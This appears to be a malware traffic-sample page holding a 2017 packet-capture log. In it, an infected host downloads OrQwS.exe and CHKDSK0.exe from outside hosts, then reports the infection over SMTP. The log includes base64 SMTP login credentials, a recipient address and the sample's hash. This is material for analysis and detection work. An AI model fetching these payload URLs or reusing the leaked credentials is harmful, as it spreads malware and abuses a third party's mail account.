Unknown E-mail C2 Malware u.teknik.io PCAP file download traffic sample CHKDSK0.exe

Download Attachments

  • 1 pcap QrQ
    Date added: November 30, 2017 3:22 am Added by: admin File size: 38 KB Downloads: 25


2017-11-29 20:09:32.668784 IP 192.168.1.102.51077 > 185.165.168.124.80: Flags [P.], seq 1471042674:1471043157, ack 3475486176, win 256, length 483: HTTP: GET /OrQwS.exe HTTP/1.1
E…a.@…r….f…|…PW.Tr.’..P…t…GET /OrQwS.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: u.teknik.io
Connection: Keep-Alive

2017-11-29 20:09:33.242526 IP 192.168.1.102.51078 > 185.165.168.124.80: Flags [P.], seq 1583158942:1583159215, ack 67316816, win 256, length 273: HTTP: GET /favicon.ico HTTP/1.1
E..9a.@…s….f…|…P^]….,PP…4…GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: u.teknik.io
Connection: Keep-Alive

2017-11-29 20:09:33.569644 IP 192.168.1.102.51079 > 185.165.168.124.443: Flags [P.], seq 3619213119:3619213243, ack 3644869978, win 256, length 124
E…a.@…tT…f…|…….?.@MZP…’…….w…s..Z.Y..@…..[.8..v.UZ..y..e…M……/.5…
….. .
.2.8…….2…………..u.teknik.io……….
…………..
2017-11-29 20:09:33.754167 IP 192.168.1.102.51079 > 185.165.168.124.443: Flags [P.], seq 124:258, ack 3824, win 253, length 134
E…a.@…tH…f…|………@\IP………..F…BA.%.{.0;b..(],.(….-.3..A8Z2a…..<……….V#…`uO..4..i.d.(.f……….0.I.0…N.QI….G….#.GpY}…”y.=..L….c.C.+,.F
2017-11-29 20:09:48.455196 IP 192.168.1.102.51081 > 62.210.16.62.80: Flags [P.], seq 3611755535:3611756033, ack 900678019, win 256, length 498: HTTP: GET /images/CHKDSK0.exe HTTP/1.1
E…Z.@….<…f>..>…P.G..5.A.P…^…GET /images/CHKDSK0.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: lesfaverelles.com
Connection: Keep-Alive

2017-11-29 20:09:55.254339 IP 192.168.1.102.51079 > 185.165.168.124.443: Flags [P.], seq 258:567, ack 3883, win 252, length 309
E..]a.@…s….f…|…….A.@\.P…q…….0[x!..S..U…..}At(y.&..\..sy……..3Px.i…e…..59.9yt,hK….L…………..l.>….U6….d.v.`.L..+._JF!.’i.T..j:…q…5..0.4Z..].)..^.U .-..O.A…….s.Hv.,……..7…W/…e…~..}.XP6..=..<…..l….i…(..$..q..U…c….Z5..J].y7tB.q.w.;v…&B..At……z………z…,1..@.HK.S..DJ..{…^mMa.,I ..
2017-11-29 20:09:58.688125 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 3008276012:3008276034, ack 1709128300, win 255, length 22
E..>I.@…fW…fC.El…K.N.,e.:lP…….EHLO WIN-1OC0SUPRH6P

2017-11-29 20:09:58.726262 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 22:34, ack 173, win 255, length 12
E..4I.@…f`…fC.El…K.N.Be.;.P…C…AUTH LOGIN

2017-11-29 20:09:58.762505 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 34:76, ack 191, win 255, length 42
E..RI.@…fA…fC.El…K.N.Ne.;*P….@..Y2FwaXhhYmExQHBvc3RvY2FwaXhhYmEuY29tLmJy

2017-11-29 20:09:58.800161 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 76:90, ack 209, win 255, length 14
E..6I.@…f\…fC.El…K.N.xe.;<P….b..Y2FwaXhhYmEx

2017-11-29 20:09:58.839926 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 90:134, ack 239, win 255, length 44
E..TI.@…f=…fC.El…K.N..e.;ZP…_…MAIL FROM:<capixaba1@postocapixaba.com.br>

2017-11-29 20:09:58.874650 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 134:170, ack 247, win 254, length 36
E..LI @…fD…fC.El…K.N..e.;bP…….RCPT TO:<ricmarques2016@gmail.com>

2017-11-29 20:09:58.940366 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 170:176, ack 261, win 254, length 6
E…I!@…fa…fC.El…K.N..e.;pP…….DATA

2017-11-29 20:09:58.985032 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 176:459, ack 317, win 254, length 283
E..CI”@…eK…fC.El…K.N..e.;.P…….From: “Maq: WIN-1OC0SUPRH6P” <capixaba1@postocapixaba.com.br>
Subject: +1 Infect de Trocador! 99189
To: ricmarques2016@gmail.com
Newsgroups: “+1 INFECT DO TROCADOR DE ENDERE?O!”
Content-Type: text/html; charset=us-ascii
MIME-Version: 1.0
Date: Wed, 29 Nov 2017 20:06:39 -0500

2017-11-29 20:09:59.073221 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 459:503, ack 317, win 254, length 44
E..TI#@…f9…fC.El…K.N..e.;.P…….
+1 INFECT DE TROCADOR DE ENDERE?OS!

.

2017-11-29 20:09:59.124003 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 503:509, ack 345, win 254, length 6
E…I$@…f^…fC.El…K.N.#e.;.P…….QUIT

SHA256: 6cd68f13d54745edcdc5e0ee4101a5b5d0adc1773c547d021370c9818d366fd6
File name: CHKDSK0.exe
Detection ratio: 44 / 67
Analysis date: 2017-11-30 03:15:57 UTC
